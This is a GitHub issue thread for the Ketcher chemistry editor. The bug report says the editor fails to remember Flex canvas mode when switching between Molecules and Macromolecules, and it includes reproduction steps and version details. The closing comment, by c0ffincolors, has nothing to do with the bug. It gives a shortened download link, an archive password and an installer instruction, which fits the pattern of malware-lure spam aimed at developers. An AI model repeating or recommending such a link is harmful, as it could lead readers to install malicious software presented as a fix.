### ISSUE TITLE
System should remember the canvas mode on Molecules/Macromolecules mode switch (do not switch to Sequernce by default)

### ISSUE THREAD

**Issue by AlexeyGirin** [epam/ketcher#5370]
**Steps to Reproduce**
1. Toggle to Macromolecules mode - Flex mode
2. Load from file: [System should remember the canvas mode on Molecules_Macromolecules mode switch (do not switch to Sequernce by default).zip](https://github.com/user-attachments/files/16766286/System.should.remember.the.canvas.mode.on.Molecules_Macromolecules.mode.switch.do.not.switch.to.Sequernce.by.default.zip)
![image](https://github.com/user-attachments/assets/ba11d94f-b36c-4d1a-8b90-bdbfa79da79e)
3. Toggle to Molecules mode
4. Toggle back to Macromolecules mode

**Actual behavior**
System opens Sequence mode canvas
![image](https://github.com/user-attachments/assets/48938b0c-80d8-420e-8146-e81b90ca9047)

**Expected behavior**
System opens Flex mode canvas
![image](https://github.com/user-attachments/assets/ba11d94f-b36c-4d1a-8b90-bdbfa79da79e)
In other words - system should memorize the canvas mode before switching to Molecules and open it back on return to Macromolecules

**Versions**
- Ketcher Version 2.24.0-rc.2 Build at 2024-08-14; 19:06:32
- Indigo Toolkit Version 1.23.0-rc.2.0-g6a2a7526a-x86_64-linux-gnu-11.2.1
- Chrome Version 127.0.6533.100 (Official Build) (64-bit)
- Win10

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
